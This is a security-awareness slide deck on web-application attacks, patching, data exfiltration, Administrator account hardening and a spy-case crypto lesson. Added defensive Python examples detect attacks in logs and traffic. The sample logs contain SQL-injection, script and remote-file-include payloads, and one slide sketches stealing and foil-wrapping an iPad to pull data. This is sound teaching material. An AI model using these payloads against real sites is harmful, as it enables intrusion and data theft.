Doom and Gloom
Dave Packham
Operating systems continue to have fewer remotely-exploitable vulnerabilities that lead to massive Internet worms.
Web Application Attacks
• There appear to be two main avenues for exploiting and compromising web servers: brute-force password guessing attacks and web application attacks.
• Microsoft SQL, FTP, and SSH servers are popular targets for password guessing attacks because of the access that is gained if a valid username/password pair is identified.
• SQL Injection, Cross-site Scripting and PHP File Include attacks continue to be the three most popular techniques used for compromising web sites.
• Automated tools, designed to target custom web application vulnerabilities, make it easy to discover and infect several thousand web sites.
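The slide names the attack classes but not how a defender would spot them in server logs. The following is an added example (not part of the original deck): a small log triage script that runs the three web-application signatures plus a repeated-401 rule over constructed Apache "combined" log lines. The signature regexes, the threshold of five failures and the sample addresses (RFC 5737 documentation ranges) are all assumptions made for the example.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_plus

# Apache/nginx "combined" format: client ip, identd, user, [time], "METHOD path proto", status, size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) \S+')

# Coarse signatures for the three categories named on the slide.
# They are a triage aid for log review, not a WAF: expect tuning on real traffic.
SIGNATURES = {
    "sql_injection": re.compile(r"(union\s+select|\bor\s+1\s*=\s*1|;\s*drop\s+table|sleep\s*\()", re.I),
    "cross_site_scripting": re.compile(r"(<script|javascript:|\bon(error|load)\s*=)", re.I),
    "php_file_include": re.compile(r"[?&][\w\[\]]+=(https?|ftp)://", re.I),
}
# Repeated HTTP 401s from one client mark password guessing (assumed threshold).
AUTH_FAIL_THRESHOLD = 5


def classify_request(path: str) -> list:
    """Return the signature names matching a request path.

    The path is decoded twice so double URL-encoding does not hide the payload.
    """
    decoded = unquote_plus(unquote_plus(path))
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]


def analyze(log_text: str) -> dict:
    """Group matching requests by category and count 401 responses per client IP."""
    hits = defaultdict(list)
    auth_failures = Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, _method, path, status = m.groups()
        for name in classify_request(path):
            hits[name].append((ip, path))
        if status == "401":
            auth_failures[ip] += 1
    hits["password_guessing"] = sorted(
        (ip, n) for ip, n in auth_failures.items() if n >= AUTH_FAIL_THRESHOLD
    )
    return dict(hits)


# Constructed sample log lines (RFC 5737 documentation addresses), not real traffic.
SAMPLE_LOG = "\n".join(
    [
        '203.0.113.5 - - [01/Jul/2010:10:01:02 +0000] "GET /news.php?id=7 HTTP/1.1" 200 5120',
        '203.0.113.5 - - [01/Jul/2010:10:01:09 +0000] "GET /news.php?id=7%20UNION%20SELECT%20user,pass%20FROM%20users HTTP/1.1" 200 6144',
        '198.51.100.23 - - [01/Jul/2010:10:02:11 +0000] "GET /index.php?page=http://203.0.113.99/c.txt? HTTP/1.1" 200 812',
        '198.51.100.23 - - [01/Jul/2010:10:02:30 +0000] "GET /search.php?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 2048',
    ]
    + [
        f'192.0.2.77 - - [01/Jul/2010:10:03:{s:02d} +0000] "POST /admin/login.php HTTP/1.1" 401 310'
        for s in range(6)
    ]
    + ['192.0.2.77 - - [01/Jul/2010:10:03:09 +0000] "GET /about.html HTTP/1.1" 200 1024']
)

if __name__ == "__main__":
    for category, entries in analyze(SAMPLE_LOG).items():
        print(category, entries)
```

Each category comes back with the client IP and decoded-on-match request path, which is what an analyst needs to pivot into the rest of that client's session; the 401 counter is deliberately separate because password guessing shows up in status codes, not in request payloads.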
Patch people…
• Attacks on Microsoft Windows operating systems were dominated by Conficker/Downadup worm variants.
• For the past six months, over 90% of the attacks recorded against Microsoft software targeted the buffer overflow vulnerability described in Microsoft Security Bulletin MS08-067.
• Although in much smaller proportion, Sasser and Blaster, the infamous worms from 2003 and 2004, continue to infect many networks.
Apple: QuickTime and Six More
• Apple has released patches for many vulnerabilities in QuickTime over the past year.
• QuickTime vulnerabilities account for most of the attacks that are being launched against Apple software.
• Note that QuickTime runs on both Mac and Windows operating systems.
• The following vulnerabilities should be patched for any QuickTime installations: CVE-2009-0007, CVE-2009-0003, CVE-2009-0957.
Origin and Destination Analysis
• Over the past six months, we have seen some very interesting trends when comparing the country where various attacks originate to the country of the attack destination.
• The analysis performed for this report identified these attack categories as high-risk threats to most if not all networks, and as such, they should be at the forefront of security practitioners' minds.
• These categories are Server-Side HTTP attacks, Client-Side HTTP attacks, PHP Remote File Include, Cross-site Scripting attacks, and finally SQL Injection attacks.
The Meatspace Attack
• SEU problem == id10t errors
From Wikipedia, the free encyclopedia
• Meatspace refers to real life or the physical world, and is conceived as the opposite of cyberspace or virtuality.
• The term entered the Oxford English Dictionary in 2000.
Change of focus
• Attackers have long picked up on this opportunity and have switched to different types of attacks in order to take advantage of these vulnerabilities, using social engineering techniques to lure end-users into opening documents received by e-mail, or by infecting websites with links to documents that have attacks for these vulnerabilities embedded.
• These infected documents are not only placed on popular web sites that have a large number of visitors, but increasingly target the "long tail": the thousands of specialized websites that have smaller but very faithful audiences.
• By identifying and exploiting vulnerabilities in the Content Management Systems used by these sites, attackers can automate the infection process and reach thousands of sites in a matter of hours.
• Attacks using PDF vulnerabilities saw a large increase in late 2008 and 2009 as it became clear to attackers how easy it is to use this method of gaining control over a machine.
Steps 6 and 7: Exfiltration
• In Step 6, with full domain administrator privileges, the attacker now compromises a server machine that stores secrets for the organization.
• In Step 7, the attacker exfiltrates this sensitive information, consisting of over 200 Megabytes of data. The attacker pushes this data out to the Internet from the server, again using HTTPS to encrypt the information, minimizing the chance of it being detected.
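HTTPS hides the payload, so the one signal left for a defender in Step 7 is volume and direction: a server that normally talks only to internal hosts suddenly pushing hundreds of megabytes to the Internet. The following is an added example, not from the deck or any product, of that egress check over a constructed one-hour flow summary. The role table, per-host baselines, the 50 MB server limit and the 10x multiplier are all assumed policy values for the example.

```python
import ipaddress
from collections import defaultdict

# RFC 1918 ranges: flows that stay inside these are not Internet exfiltration.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Assumed policy values for this example: a server should rarely push more than
# 50 MB per hour to the Internet, and any host is suspicious at 10x its own baseline.
SERVER_ABSOLUTE_LIMIT = 50 * 1024 * 1024
BASELINE_MULTIPLIER = 10

# Constructed asset data: host role and typical hourly Internet egress in bytes.
ROLE = {"10.1.5.20": "server", "10.1.5.21": "server",
        "10.1.7.33": "workstation", "10.1.7.34": "workstation"}
BASELINE_EGRESS = {"10.1.5.20": 2_000_000, "10.1.5.21": 2_000_000,
                   "10.1.7.33": 20_000_000, "10.1.7.34": 20_000_000}

# Constructed one-hour flow summary: (src, dst, dst_port, bytes_sent_by_src).
FLOWS = [
    ("10.1.5.20", "10.1.5.2", 445, 80_000_000),       # server to domain controller: internal
    ("10.1.5.20", "203.0.113.40", 443, 210_000_000),  # server pushing ~200 MB out over HTTPS
    ("10.1.7.33", "198.51.100.8", 443, 3_000_000),    # workstation browsing
    ("10.1.7.34", "198.51.100.9", 443, 900_000),
    ("10.1.5.21", "203.0.113.41", 443, 1_500_000),    # server fetching updates
]


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def internet_egress(flows) -> dict:
    """Sum the bytes each internal host sent to non-RFC1918 destinations."""
    totals = defaultdict(int)
    for src, dst, _port, nbytes in flows:
        if is_internal(src) and not is_internal(dst):
            totals[src] += nbytes
    return dict(totals)


def flag_exfiltration(flows, role=ROLE, baseline=BASELINE_EGRESS) -> list:
    """Return (host, bytes) for hosts whose Internet egress exceeds their limit.

    The limit is BASELINE_MULTIPLIER times the host's own baseline; servers also
    get the absolute cap, whichever is tighter. A host with no recorded baseline
    has a limit of zero, so any Internet egress from it is reported.
    """
    flagged = []
    for host, sent in sorted(internet_egress(flows).items()):
        limit = baseline.get(host, 0) * BASELINE_MULTIPLIER
        if role.get(host) == "server":
            limit = min(limit or SERVER_ABSOLUTE_LIMIT, SERVER_ABSOLUTE_LIMIT)
        if sent > limit:
            flagged.append((host, sent))
    return flagged


if __name__ == "__main__":
    for host, sent in flag_exfiltration(FLOWS):
        print(f"{host}: {sent / 1_000_000:.0f} MB to the Internet this hour")
```

The same logic applies to NetFlow/IPFIX exports or proxy logs summarised per hour; what matters is that the server's 80 MB of internal SMB traffic is ignored while its 210 MB over port 443 to an outside address is not.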
#1 Disable It
• The built-in Administrator is basically a setup and disaster recovery account. You should use it during setup and to join the machine to the domain. After that you should never use it again, so disable it.
• Should you need to use the Recovery Console or boot into Safe Mode, the account is automatically re-enabled for use only in those troubleshooting tools. Once you boot the system normally again, it is disabled.
#2 Set a Unique Password
• If the account is disabled, what does it matter what the password is?
• Well, it matters if the account is not disabled on every system. How many unique passwords are used on the built-in Administrator accounts across all systems in your environment?
• If the answer is less than the number of systems in your environment, you have a problem.
• If only one of those systems is compromised, the bad guy can dump out the password hashes and he’ll then have all he needs to authenticate to all the other systems.
• (Note that it does not matter how strong the password is here; if the bad guy has the hashes, password strength is irrelevant.)
#3 Set a Very Long Password, or None at All
• Obviously a really long password is a good idea.
• In certain situations, a blank one may be even better.
• In an environment where you can guarantee physical security, you do not need to use the account across the network, and you are using Windows XP or Windows Server 2003, a blank password is better than a weak password. By default, blank passwords can only be used locally in Windows XP and Windows Server 2003.
• If the account password is blank, the account is not valid as a network credential. Of course, if you have more than one administrator, it leaves you open to abuse and accountability issues, so you need to carefully consider this approach.
• If you need to be concerned with those problems, set a very long password—127 characters or so. That way the account is as good as disabled.
Don’t Rename It
• You will find many resources that recommend renaming the account and then creating a honey-pot account called Administrator to lure attackers.
• No attacker worth his salt will be fooled by those tactics. The RID for the account is always 500.
• There are abundant tools that can find the real account. Besides, don’t you have enough to do securing your network without building things that people should be breaking into?
• Your time will be better spent on network security.
Hacking the iPad/iPhone
• Easy peasy
Pull data
• Public and private keys stored ON the device.
• Steal device.
• Cover in foil.
• Remote wipe sent? Bazinga!!!
• Cable in bottom. Data pulled with commands sent to the OS via iTunes remote commands.
Hacks?
• Tiny chip players carry that they can throw into the goal to fool detectors.
Lesson 1: Encrypt your Wifi
• On Monday, a number of Russian nationals were arrested for espionage against the US.
• With all the talk and attention paid to cyber spies, spear phishing, APT and new high-tech satellites and drones, it is almost refreshing to see that good old-fashioned human spies are still used and apparently found valuable.
• Skynet hasn't taken over quite yet.
• However, the story has a few neat cyber security lessons.
Lesson 2: Keep your password secure
• The FBI had been following these spies for a while.
• A few years back, the FBI secretly searched the homes of some of the spies, copying various hard disks in the process. Small problem:
• The hard disk was encrypted. Luckily, an observant FBI agent noted a piece of paper during the search with a long number/letter combination.
• It turned out to be the password.
• This was critical, as it allowed the agents not only to decrypt the hard disk, but also to find on it steganography software and other encryption tools, as well as lists of web sites used to exchange steganographic messages.
Lesson 3: Obscurity != Security
• The spies to some extent used steganography to exchange messages.
• These messages were encoded into an image, and then uploaded to various web sites.
• As explained above, the FBI was able to obtain a list of these sites and the software used to encode them. However, at least according to some reports, the messages were not encrypted.
• Typically, if you want to do steganography right, first encrypt the message, then encode it in an image. This holds in particular if you use standard software to perform your steganography, since anyone holding the same tool can extract the hidden bytes.
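To make the "encrypt first, then hide" point concrete, here is an added example (not code from the deck or from any steganography tool the spies used): a least-significant-bit embedder over a constructed 8-bit sample buffer standing in for image pixels, run once with the raw message and once with the message encrypted first. The examiner in the example holds the tool but not the key; the only thing separating the two runs is whether what comes out is readable. The HMAC-SHA256 counter-mode keystream is a stand-in for a real cipher, chosen so the example runs with the standard library only, and the cover, message and key are all constructed.

```python
import hashlib
import hmac
import secrets
import string

# Constructed "image": 4096 8-bit samples, standing in for the grayscale pixels a real
# tool would read from a file. Random content keeps the example offline and self-contained.
COVER = bytearray(secrets.token_bytes(4096))
MESSAGE = b"Meet at the usual bench on Tuesday at noon. Bring the second package."  # constructed
KEY = secrets.token_bytes(32)                                                           # constructed


def keystream(key: bytes, n: int) -> bytes:
    """HMAC-SHA256 in counter mode, used here as a demo stream cipher; a real
    tool would use AES-GCM or another AEAD from a vetted library."""
    out, ctr = b"", 0
    while len(out) < n:
        out += hmac.new(key, ctr.to_bytes(4, "big"), hashlib.sha256).digest()
        ctr += 1
    return out[:n]


def xor_crypt(key: bytes, data: bytes) -> bytes:
    """Encrypt or decrypt (same operation) by XOR with the keystream."""
    return bytes(a ^ b for a, b in zip(data, keystream(key, len(data))))


def embed_lsb(cover: bytearray, payload: bytes) -> bytearray:
    """Hide payload bits in the least significant bit of consecutive samples."""
    bits = "".join(f"{b:08b}" for b in payload)
    if len(bits) > len(cover):
        raise ValueError("cover too small for payload")
    stego = bytearray(cover)
    for i, bit in enumerate(bits):
        stego[i] = (stego[i] & 0xFE) | int(bit)
    return stego


def extract_lsb(stego: bytes, nbytes: int) -> bytes:
    """What anyone holding the same tool recovers: the raw hidden bytes."""
    bits = "".join(str(b & 1) for b in stego[: nbytes * 8])
    return bytes(int(bits[i : i + 8], 2) for i in range(0, len(bits), 8))


def printable_ratio(data: bytes) -> float:
    """Fraction of printable ASCII bytes: about 1.0 for text, about 0.4 for ciphertext."""
    printable = set(string.printable.encode())
    return sum(b in printable for b in data) / len(data)


def compare() -> dict:
    """Embed the same message unencrypted and encrypted, then look at what an
    examiner who has the tool (but not the key) pulls out of each image."""
    plain_img = embed_lsb(COVER, MESSAGE)
    enc_img = embed_lsb(COVER, xor_crypt(KEY, MESSAGE))
    n = len(MESSAGE)
    pulled_plain = extract_lsb(plain_img, n)
    pulled_enc = extract_lsb(enc_img, n)
    return {
        "plain_readable": printable_ratio(pulled_plain),      # examiner reads it directly
        "encrypted_readable": printable_ratio(pulled_enc),    # examiner gets noise
        "plain_matches": pulled_plain == MESSAGE,
        "key_holder_recovers": xor_crypt(KEY, pulled_enc) == MESSAGE,
    }


if __name__ == "__main__":
    for name, value in compare().items():
        print(f"{name}: {value}")
```

The printable-byte ratio is the same quick test an examiner would apply to extracted data: near 1.0 means the hiding step was the only protection, while a ratio near the 100/256 expected for uniformly random bytes means a key still stands between the examiner and the content.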
Lesson 4: Perfect forward security
• Perfect forward security is an important cryptographic concept.
• You never want to use an old password to encrypt the new password. If you do, once an attacker figures out one password, they will be able to decrypt all future passwords.
• It appears that the spies frequently made arrangements about future meetings and communication protocols over insecure channels (like the ad-hoc wifi). In some ways this may also be considered relying on obscurity again.
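The slide's warning (one leaked password unlocks every later one) is easiest to see side by side with the alternative that gives forward secrecy: a fresh ephemeral Diffie-Hellman exchange per session, with the exponents thrown away. The following is an added example, not from the deck: both schemes produce a recorded transcript, and the same eavesdropper, holding the transcript plus the first session key, replays it against each. The toy group (the Mersenne prime 2**127 - 1, generator 3), the HMAC-based demo cipher and the sample messages are assumptions made so the example runs offline with the standard library; real code would use a vetted group or curve and an AEAD.

```python
import hashlib
import hmac
import secrets

# Toy Diffie-Hellman group for illustration: 2**127 - 1 is prime but far too small
# for real use; production code takes a vetted group (RFC 7919) or an elliptic curve.
P = 2**127 - 1
G = 3
N_SESSIONS = 4


def subkey(key: bytes, label: bytes) -> bytes:
    """Derive separate encryption and MAC keys from one session key."""
    return hashlib.sha256(label + key).digest()


def keystream(key: bytes, n: int) -> bytes:
    """HMAC-SHA256 in counter mode as a demo stream cipher (not for production)."""
    out, ctr = b"", 0
    while len(out) < n:
        out += hmac.new(key, ctr.to_bytes(4, "big"), hashlib.sha256).digest()
        ctr += 1
    return out[:n]


def seal(key: bytes, msg: bytes) -> bytes:
    """Encrypt-then-MAC: ciphertext || 32-byte tag."""
    ct = bytes(a ^ b for a, b in zip(msg, keystream(subkey(key, b"enc"), len(msg))))
    return ct + hmac.new(subkey(key, b"mac"), ct, hashlib.sha256).digest()


def open_(key: bytes, blob: bytes):
    """Return the plaintext, or None when the tag does not verify under this key."""
    ct, tag = blob[:-32], blob[-32:]
    if not hmac.compare_digest(tag, hmac.new(subkey(key, b"mac"), ct, hashlib.sha256).digest()):
        return None
    return bytes(a ^ b for a, b in zip(ct, keystream(subkey(key, b"enc"), len(ct))))


def chained_transcript(messages):
    """Scheme A (what the slide warns against): each new session key travels
    over the wire encrypted under the previous one."""
    keys, wire = [secrets.token_bytes(32)], []
    for i, m in enumerate(messages):
        if i > 0:
            keys.append(secrets.token_bytes(32))
            wire.append(("rekey", seal(keys[i - 1], keys[i])))
        wire.append(("data", seal(keys[i], m)))
    return keys, wire


def dh_transcript(messages):
    """Scheme B: a fresh ephemeral DH exchange per session; the exponents are
    discarded, so nothing on the wire links one session key to the next."""
    keys, wire = [], []
    for m in messages:
        a, b = secrets.randbelow(P - 2) + 1, secrets.randbelow(P - 2) + 1
        A, B = pow(G, a, P), pow(G, b, P)
        shared = pow(B, a, P)                      # the peer computes pow(A, b, P)
        k = hashlib.sha256(shared.to_bytes(16, "big")).digest()
        del a, b                                   # ephemeral secrets do not outlive the session
        keys.append(k)
        wire.append(("dh", A.to_bytes(16, "big") + B.to_bytes(16, "big")))
        wire.append(("data", seal(k, m)))
    return keys, wire


def replay_with_leaked_key(wire, leaked_key):
    """An eavesdropper who recorded the traffic and later obtained one session key
    tries each blob with the key it currently holds, following rekeys that open."""
    key, recovered = leaked_key, []
    for kind, blob in wire:
        if kind == "dh":
            continue                               # public values only; nothing to decrypt
        pt = open_(key, blob)
        if pt is None:
            continue
        if kind == "rekey":
            key = pt                               # the leaked key hands over the next one
        else:
            recovered.append(pt)
    return recovered


def demo():
    """Messages recovered from each scheme when the first session key leaks."""
    msgs = [f"meeting plan {i}".encode() for i in range(N_SESSIONS)]   # constructed
    keys_a, wire_a = chained_transcript(msgs)
    keys_b, wire_b = dh_transcript(msgs)
    return (len(replay_with_leaked_key(wire_a, keys_a[0])),
            len(replay_with_leaked_key(wire_b, keys_b[0])))


if __name__ == "__main__":
    chained, ephemeral = demo()
    print(f"chained keys: {chained} of {N_SESSIONS} sessions exposed")
    print(f"ephemeral DH: {ephemeral} of {N_SESSIONS} sessions exposed")
```

With the chained scheme the leak of session 0 cascades through every rekey message, so all four sessions are exposed; with per-session ephemeral DH the same leak exposes exactly the one session whose key was lost, because the transcript carries only public values and the exponents that would reproduce the other keys no longer exist.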